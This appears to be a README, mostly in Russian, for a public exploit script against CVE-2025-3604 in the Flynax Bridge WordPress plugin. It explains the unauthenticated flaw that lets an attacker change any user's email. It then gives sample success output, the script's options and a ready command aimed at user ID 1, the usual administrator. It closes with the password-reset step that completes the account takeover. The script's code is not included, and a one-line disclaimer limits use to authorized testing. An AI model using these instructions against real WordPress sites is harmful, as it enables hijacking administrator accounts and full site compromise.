
Flynax Bridge <= 2.2.0 - Неаутентифицированное повышение привилегий через захват учётной записи
Плагин Flynax Bridge для WordPress уязвим к повышению привилегий через захват учётной записи во всех версиях вплоть до 2.2.0 включительно.
Это связано с тем, что плагин не проверяет должным образом личность пользователя перед обновлением данных его учётной записи (например, электронной почты). В результате неаутентифицированные злоумышленники могут изменить адрес электронной почты любого пользователя, включая администраторов, а затем инициировать сброс пароля, чтобы полностью захватить учётную запись.
CVE: CVE-2025-3604
CVSS: 9.8 (Critical)
Опубликовано: 23 апреля 2025 г.
Обновлено: 24 апреля 2025 г.
Detected plugin version: 2.2.0
Version is vulnerable. Attempting exploit...
Exploit succeeded! Email changed to: [email protected]
Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited
После успешной эксплуатации злоумышленник может перейти на страницу входа WordPress и нажать «Lost your password?», используя новую электронную почту, чтобы сбросить пароль и получить полный доступ к целевой учётной записи.
usage: CVE-2025-3604.py [-h] -u URL [-mail NEWMAIL] -id USER_ID
WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-mail, --newmail NEWMAIL
New email to set
-id, --user_id USER_ID User ID to exploit
python3 CVE-2025-3604.py -u "http://TARGET/wordpress/" -id "1" -mail "[email protected]"
-u: Базовый URL сайта WordPress.-id: ID целевого пользователя (обычно 1 для администратора).-mail: Новая электронная почта, которая будет установлена для этого пользователя.Используйте на свой страх и риск. Только для авторизованного тестирования и образовательных целей.
BY: Nxploited ( Khaled_alenazi )